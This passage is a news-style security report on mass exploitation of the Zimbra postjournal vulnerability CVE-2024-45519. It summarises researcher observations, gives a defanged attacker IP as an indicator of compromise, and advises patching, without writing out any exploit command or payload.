# Attackers Take Advantage of Severe Zimbra Mail Server Flaw: CVE-2024-45519
## Overview
Cybersecurity experts are alerting the public about the ongoing exploitation of a severe vulnerability in Zimbra mail servers, designated as **CVE-2024-45519**. This flaw permits attackers to execute harmful commands remotely on compromised servers, potentially leading to the installation of backdoors and exposure of sensitive information. Zimbra, a widely used email and collaboration solution for medium and large enterprises, has released a patch to remediate the issue, but organizations that have yet to implement the update remain at risk.
This vulnerability is alarming because it can be activated by sending a maliciously designed email to a Zimbra server where the **postjournal** service has been manually activated by an administrator. Although this service is not enabled by default, which may reduce the count of vulnerable servers, the simplicity of the exploitation renders it a significant risk.
## How the Exploit Operates
The flaw exists within the **postjournal** service of Zimbra servers. When enabled, attackers can dispatch specially constructed emails to the server, which will then execute commands on the system. The method of attack is relatively straightforward: by firing off harmful emails to an address on the Zimbra server, the perpetrator can incite remote code execution (RCE) and potentially introduce a backdoor.
### Key Points:
– **Vulnerability ID**: CVE-2024-45519
– **Affected Product**: Zimbra email and collaboration server
– **Attack Vector**: Maliciously constructed emails sent to a Zimbra server with the postjournal service activated
– **Potential Impact**: Remote code execution, installation of backdoors, and further compromise of the server
Zimbra has issued a [security advisory](https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories) and provided a patch to fix the vulnerability. Organizations using Zimbra are strongly encouraged to implement the patch without delay or, at a minimum, disable the postjournal service if it is unnecessary.
## Initial Reports of Exploitation
On Tuesday, security researcher **Ivan Kwiatkowski** was the first to announce the active exploitation of the vulnerability in real-world scenarios. He referred to the attacks as “mass exploitation,” with harmful emails dispatched from the IP address **79.124.49[.]86**. The attack aims to retrieve a file from the same IP address utilizing the **curl** command, a tool frequently employed for data transfers to or from a server.
Researchers from **Proofpoint**, a premier cybersecurity firm, subsequently verified the report, noting that the attacks were opportunistic and geographically widespread. Though the exploitation attempts were extensive, they did not appear to be particularly sophisticated. The attackers utilized the same server for sending the exploit emails and hosting the second-stage payloads, suggesting a deficiency in the distributed infrastructure often observed in more complex operations.
## Limited Impact So Far
In spite of the exploitation’s simplicity, researchers have identified that the overall impact of the attacks seems to be minimal. **Ron Bowes**, another security researcher, noted that the payload downloaded by the exploit “doesn’t actually do anything” — it just downloads a file to the server’s standard output (stdout) without running it. Bowes also reported that his honeypot server received approximately 500 requests within just one hour, implying that the attackers are actively probing for vulnerable servers.
Bowes clarified that the payload is not delivered directly through the malicious emails but is instead retrieved through a direct connection to the malicious server via **SMTP** (Simple Mail Transfer Protocol). This method of attack, while worrying, does not currently appear to have led to widespread infections or the deployment of ransomware or espionage malware.
## Insights from Proofpoint
In a communication sent on Wednesday, **Greg Lesnewich**, a researcher at Proofpoint, offered further insights into the ongoing exploitation efforts. He observed that while the attacks were indiscriminate in nature, the frequency of exploitation attempts remained relatively low. Lesnewich also highlighted that while the exploitation process is straightforward, its reliability remains uncertain.
Key insights from Proofpoint include:
– **Indiscriminate Targeting**: The attacks do not seem to be highly specific, and the exploitation efforts are spread across various regions.
– **Opportunistic Nature**: The attackers are likely searching for vulnerable servers to exploit as they come across them.
– **Limited Infrastructure**: The same server is employed to send exploit emails and host the second-stage payloads, revealing a lack of sophisticated resources.
– **Indicators of Compromise (IoCs)**: Defenders should keep an eye out for suspicious CC or To addresses in emails, in conjunction with outbound connections from Zimbra servers to remote IP addresses.
## Exploit Insights
According to Proofpoint, some of the malicious emails utilized various email addresses in the **CC** field, which were encoded using **base64**. Upon decoding and combining these addresses, they attempted to install a **webshell-based back
